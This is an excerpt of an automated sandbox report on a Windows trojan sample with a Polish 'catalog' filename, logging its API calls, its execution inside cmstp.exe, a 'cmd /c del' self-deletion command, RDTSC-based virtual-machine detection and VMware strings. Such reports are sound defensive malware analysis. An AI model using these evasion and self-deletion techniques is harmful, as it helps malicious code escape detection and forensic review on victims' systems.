          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02978700 NtClose,11_2_02978700
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029785D0 NtCreateFile,11_2_029785D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029786FA NtClose,11_2_029786FA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297867E NtReadFile,11_2_0297867E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029787AA NtAllocateVirtualMemory,11_2_029787AA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029785CD NtCreateFile,11_2_029785CD
          Source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.360157911.000000000EB2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426560618.0000000000C3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: nowy przyk#U0142adowy katalog.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile read: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeJump to behavior
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"Jump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile created: C:\Users\user\AppData\Local\Temp\nsi487A.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@11/9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C1
          Source: nowy przyk#U0142adowy katalog.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: cmstp.pdbGCTL source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.355596507.000000000E880000.00000004.00000001.sdmp, nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, cmstp.exe, 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nowy przyk#U0142adowy katalog.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10005CC5 push ecx; ret 0_2_10005CD8
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B87C push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B812 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B81B push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00416036 push cs; ret 1_2_0041604B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041A988 push cs; ret 1_2_0041A989
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00415C85 push 0000003Eh; ret 1_2_00415C87
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00414EBC push ecx; retf 1_2_00414EBD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A0D0D1 push ecx; ret 1_2_00A0D0E4
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B87C push eax; ret 1_1_0041B882
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B812 push eax; ret 1_1_0041B818
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B81B push eax; ret 1_1_0041B882
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00416036 push cs; ret 1_1_0041604B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041A988 push cs; ret 1_1_0041A989
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00415C85 push 0000003Eh; ret 1_1_00415C87
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00414EBC push ecx; retf 1_1_00414EBD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B7C5 push eax; ret 1_1_0041B818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0469D0D1 push ecx; ret 11_2_0469D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B812 push eax; ret 11_2_0297B818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B81B push eax; ret 11_2_0297B882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02976036 push cs; ret 11_2_0297604B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B87C push eax; ret 11_2_0297B882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297A988 push cs; ret 11_2_0297A989
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02974EBC push ecx; retf 11_2_02974EBD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B7C5 push eax; ret 11_2_0297B818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02975C85 push 0000003Eh; ret 11_2_02975C87
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile created: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"Jump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10004E3E RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_10004E3E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002968614 second address: 000000000296861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000029689AE second address: 00000000029689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5448Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 776Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10002F80 lstrcpyW,lstrlenW,lstrcpyW,lstrcatW,FindFirstFileW,wsprintfW,_GetThemeDocumentationProperty@16,_GetThemeDocumentationProperty@16,FindNextFileW,FindClose,0_2_10002F80
          Source: explorer.exe, 00000005.00000000.371834942.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.409164821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.403585689.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.371834942.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.403585689.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.382841011.000000000461E000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.409164821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10008417 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_10008417
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10008417 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_10008417
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10003770 rtrystwqtc,GetProcessHeap,RtlAllocateHeap,VirtualProtect,0_2_10003770
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015406 mov eax, dword ptr fs:[00000030h]0_2_10015406
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1001561A mov eax, dword ptr fs:[00000030h]0_2_1001561A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_100156CB mov eax, dword ptr fs:[00000030h]0_2_100156CB
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1001570A mov eax, dword ptr fs:[00000030h]0_2_1001570A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015748 mov eax, dword ptr fs:[00000030h]0_2_10015748
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9080 mov eax, dword ptr fs:[00000030h]1_2_009B9080
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EF0BF mov ecx, dword ptr fs:[00000030h]1_2_009EF0BF
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EF0BF mov eax, dword ptr fs:[00000030h]1_2_009EF0BF
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EF0BF mov eax, dword ptr fs:[00000030h]1_2_009EF0BF
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A33884 mov eax, dword ptr fs:[00000030h]1_2_00A33884
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A33884 mov eax, dword ptr fs:[00000030h]1_2_00A33884
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F90AF mov eax, dword ptr fs:[00000030h]1_2_009F90AF
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]1_2_009E20A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]1_2_009E20A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]1_2_009E20A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]1_2_009E20A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]1_2_009E20A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]1_2_009E20A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A4B8D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00A4B8D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A4B8D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A4B8D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A4B8D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A4B8D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B58EC mov eax, dword ptr fs:[00000030h]1_2_009B58EC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]1_2_009E002D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]1_2_009E002D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]1_2_009E002D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]1_2_009E002D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]1_2_009E002D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37016 mov eax, dword ptr fs:[00000030h]1_2_00A37016
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37016 mov eax, dword ptr fs:[00000030h]1_2_00A37016
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37016 mov eax, dword ptr fs:[00000030h]1_2_00A37016
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB02A mov eax, dword ptr fs:[00000030h]1_2_009CB02A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB02A mov eax, dword ptr fs:[00000030h]1_2_009CB02A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB02A mov eax, dword ptr fs:[00000030h]1_2_009CB02A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB02A mov eax, dword ptr fs:[00000030h]1_2_009CB02A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A84015 mov eax, dword ptr fs:[00000030h]1_2_00A84015
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A84015 mov eax, dword ptr fs:[00000030h]1_2_00A84015
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D0050 mov eax, dword ptr fs:[00000030h]1_2_009D0050
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D0050 mov eax, dword ptr fs:[00000030h]1_2_009D0050
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A72073 mov eax, dword ptr fs:[00000030h]1_2_00A72073
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A81074 mov eax, dword ptr fs:[00000030h]1_2_00A81074
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A369A6 mov eax, dword ptr fs:[00000030h]1_2_00A369A6
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2990 mov eax, dword ptr fs:[00000030h]1_2_009E2990
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA185 mov eax, dword ptr fs:[00000030h]1_2_009EA185
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A351BE mov eax, dword ptr fs:[00000030h]1_2_00A351BE
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A351BE mov eax, dword ptr fs:[00000030h]1_2_00A351BE
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A351BE mov eax, dword ptr fs:[00000030h]1_2_00A351BE
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A351BE mov eax, dword ptr fs:[00000030h]1_2_00A351BE
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DC182 mov eax, dword ptr fs:[00000030h]1_2_009DC182
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E61A0 mov eax, dword ptr fs:[00000030h]1_2_009E61A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E61A0 mov eax, dword ptr fs:[00000030h]1_2_009E61A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A441E8 mov eax, dword ptr fs:[00000030h]1_2_00A441E8
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB1E1 mov eax, dword ptr fs:[00000030h]1_2_009BB1E1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB1E1 mov eax, dword ptr fs:[00000030h]1_2_009BB1E1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB1E1 mov eax, dword ptr fs:[00000030h]1_2_009BB1E1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9100 mov eax, dword ptr fs:[00000030h]1_2_009B9100
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9100 mov eax, dword ptr fs:[00000030h]1_2_009B9100
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9100 mov eax, dword ptr fs:[00000030h]1_2_009B9100
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E513A mov eax, dword ptr fs:[00000030h]1_2_009E513A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E513A mov eax, dword ptr fs:[00000030h]1_2_009E513A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov eax, dword ptr fs:[00000030h]1_2_009D4120
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov eax, dword ptr fs:[00000030h]1_2_009D4120
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov eax, dword ptr fs:[00000030h]1_2_009D4120
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov eax, dword ptr fs:[00000030h]1_2_009D4120
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov ecx, dword ptr fs:[00000030h]1_2_009D4120
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DB944 mov eax, dword ptr fs:[00000030h]1_2_009DB944
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DB944 mov eax, dword ptr fs:[00000030h]1_2_009DB944
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB171 mov eax, dword ptr fs:[00000030h]1_2_009BB171
